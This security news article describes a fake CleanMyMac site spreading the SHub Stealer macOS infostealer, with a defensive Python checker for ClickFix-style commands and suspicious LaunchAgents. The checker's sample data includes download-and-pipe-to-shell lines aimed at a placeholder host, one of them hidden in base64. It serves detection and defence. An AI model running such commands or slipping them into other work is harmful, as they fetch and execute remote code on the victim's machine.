
Fake CleanMyMac Site Spreads SHub Stealer, Targeting Crypto Wallets


Cybersecurity Alert: Mac Users Targeted by Sophisticated SHub Stealer Campaign

In a troubling development for macOS users, attackers have launched a campaign that uses a counterfeit CleanMyMac download page to distribute malware known as SHub Stealer. This infostealer is particularly effective at draining cryptocurrency wallets and harvesting sensitive personal data.

Instead of providing a familiar installer, the counterfeit webpage introduces an unconventional “advanced” installation step that instructs users to "Open Terminal and paste the following command." This technique, referred to as the ClickFix method, is becoming increasingly prevalent in recent Mac malware campaigns. It is designed to trick users into executing commands that could bypass typical security measures.

When the user runs this command, it first contacts the genuine CleanMyMac URL, producing reassuring output that creates a misleading sense of legitimacy. It then decodes a hidden base64-encoded link and downloads a shell script from the attacker’s server. That script is piped straight into zsh for execution with no visible prompt or Gatekeeper alert, sidestepping core macOS protections such as notarization checks and XProtect, which only apply to applications the system itself launches.

The loader script first checks whether a Russian-language keyboard layout is installed. If one is found, the script exits, consistent with the well-established practice among Russian-speaking cybercriminal groups of geo-fencing their attacks.

The campaign operates through a spoofed website, cleanmymacos[.]org, built to mimic the legitimate CleanMyMac product page. The site has no connection to MacPaw, the company behind the genuine CleanMyMac application. Once the user pastes the malicious command and presses Return, traditional protections like Gatekeeper, notarization checks, and XProtect no longer help, because the user, not an installer, is executing the code.

If the keyboard check passes, the loader script retrieves an AppleScript payload from the malicious server. This payload closes the Terminal window and displays a fake “System Preferences” password prompt that uses Apple’s recognizable padlock icon. The dialog text reads awkwardly: “Required Application Helper. Please enter password for continue.” The wording is a subtle hint of the deception, but the script keeps prompting, up to ten times, validating each entry against the local user account until it obtains the correct password.

With access to the legitimate password, SHub Stealer proceeds to unlock the macOS Keychain and conduct a methodical search for valuable data. It targets 14 Chromium-based browsers, as well as Firefox, for saved passwords, cookies, and autofill information. Additionally, it scans for extensions related to 102 known cryptocurrency wallets and gathers local data from various desktop wallets, including popular options such as Exodus, Atomic Wallet, Ledger Live, and Trezor Suite. The malware not only collects data from iCloud and Safari but also mines sensitive information from Apple Notes, Telegram sessions, shell histories, and configuration files that may contain tokens.

This gathered data is then compressed into a ZIP file and sent to a designated endpoint using a hardcoded API key. Temporary files are subsequently removed, thus obscuring the theft from the user.

What sets SHub apart from typical infostealer malware is that it installs long-term backdoors in cryptocurrency wallets. If the malware finds specific Electron-based wallets, it quietly replaces the applications’ core files with tampered versions fetched from the command-and-control server. It then terminates the original processes, relaunches the modified versions, and re-signs the applications so that macOS accepts the altered bundles.

In particular, the backdoored Exodus and Atomic Wallet builds exfiltrate passwords and seed phrases every time the user unlocks the wallet. The backdoored Ledger Wallet and Ledger Live builds disable TLS checks and display fake recovery wizards to capture seed phrases. The Trezor Suite build shows a misleading “critical update” overlay that captures seed phrases while disabling updates so that the malicious build persists.

To sustain full control over the compromised system, SHub establishes a LaunchAgent that mimics Google’s legitimate updater, executing every 60 seconds. This enables an ongoing backdoor to the victim’s Mac and allows the execution of base64-encoded commands, all while presenting a false error message that suggests “CleanMyMac” failed to install.
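Two of the behaviours described above leave host-side traces a defender can check for: a ClickFix-style command in shell history (a download or a base64 decode piped straight into a shell) and a LaunchAgent with a vendor-looking label, a tight StartInterval and a shell interpreter as its program. The checker below is an added example, not code from the article, MacPaw or any researcher cited; the label `com.google.updater.helper`, the host `example.invalid` and every sample line are constructed for illustration and are not real indicators.

```python
"""Host-side indicators for the ClickFix command and LaunchAgent persistence pattern.

Added example (not from the article). All sample data is constructed; the label
'com.google.updater.helper' and the host 'example.invalid' are hypothetical.
"""
import base64
import plistlib
import re

# base64 decode whose output is piped straight into a shell (macOS uses -d or -D).
_B64_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(/bin/)?(z|ba)?sh\b")
# curl/wget download piped straight into a shell.
_FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(/bin/)?(z|ba)?sh\b")
# Standalone base64-looking tokens long enough to hide a command.
_B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def decoded_base64_tokens(text):
    """Return printable decodings of base64 tokens embedded in a command line."""
    out = []
    for tok in _B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except ValueError:  # not valid base64, or not valid UTF-8 once decoded
            continue
        if decoded.isprintable():
            out.append(decoded)
    return out


def flag_command(cmd):
    """Return the reasons one command line resembles a ClickFix-style loader."""
    reasons = []
    if _FETCH_TO_SHELL.search(cmd):
        reasons.append("download piped into a shell")
    if _B64_TO_SHELL.search(cmd):
        reasons.append("base64-decoded text piped into a shell")
    for decoded in decoded_base64_tokens(cmd):
        if re.search(r"\b(curl|wget)\b|https?://", decoded):
            reasons.append("embedded base64 decodes to a download command: %r" % decoded)
    return reasons


def suspicious_commands(history_lines):
    """Keep only the shell-history lines that triggered at least one reason."""
    return [line for line in history_lines if flag_command(line)]


def assess_launch_agent(plist_bytes, max_interval=60):
    """Return reasons a LaunchAgent plist resembles the persistence described above."""
    d = plistlib.loads(plist_bytes)
    args = d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else [])
    label = d.get("Label", "")
    reasons = []
    # A vendor-style label whose program is a shell interpreter, not the vendor's binary.
    if re.search(r"google|apple|adobe|microsoft", label, re.I) and args \
            and re.search(r"/(z|ba)?sh$", args[0]):
        reasons.append("vendor-style label %r runs a shell interpreter" % label)
    interval = d.get("StartInterval")
    if isinstance(interval, int) and interval <= max_interval:
        reasons.append("StartInterval of %ds (tight beaconing loop)" % interval)
    reasons.extend(flag_command(" ".join(args)))
    return reasons


# --- constructed samples (hypothetical, not real indicators) -----------------
PAYLOAD_B64 = base64.b64encode(b"curl -s http://example.invalid/u | zsh").decode()

SUSPICIOUS_PLIST = f"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.updater.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/zsh</string><string>-c</string>
    <string>echo {PAYLOAD_B64} | base64 -d | zsh</string>
  </array>
  <key>StartInterval</key><integer>60</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>""".encode()

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/backup</string><string>--quiet</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/install | base64 -d | zsh",
    "git status",
    "echo " + PAYLOAD_B64 + " | base64 -d | sh",
]

if __name__ == "__main__":
    for line in suspicious_commands(SAMPLE_HISTORY):
        print("history:", line, flag_command(line))
    for name, plist in (("suspicious", SUSPICIOUS_PLIST), ("benign", BENIGN_PLIST)):
        print(name, "LaunchAgent:", assess_launch_agent(plist) or "no findings")
```

On a real Mac the same functions would be run over `~/.zsh_history` and the plists under `~/Library/LaunchAgents`; the heuristics are deliberately narrow (a decode or download piped into a shell, a short StartInterval, a vendor-style label backed by a shell) so that ordinary automation does not trip them, as the benign sample shows.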

Researchers note that SHub belongs to a rapidly growing family of AppleScript-based macOS infostealers that also includes MacSync Stealer and Atomic Stealer. These threats share ClickFix-style command pasting, fraudulent system prompts, and recursive data harvesting, a disturbing trend in macOS malware.

Moreover, this campaign reflects a broader tactic in cybercrime: attackers use polished imitations of reputable software to lure victims, driving traffic to them through malicious advertisements and search-engine poisoning.

Ultimately, researchers advise users to exercise caution: legitimate Mac applications almost never require the pasting of shell commands from a web page. If a site requests such an action—especially one that mimics a trusted brand—it should be viewed as a significant warning sign. Users are urged to shut down the webpage and only download software from recognized suppliers or the official Mac App Store.
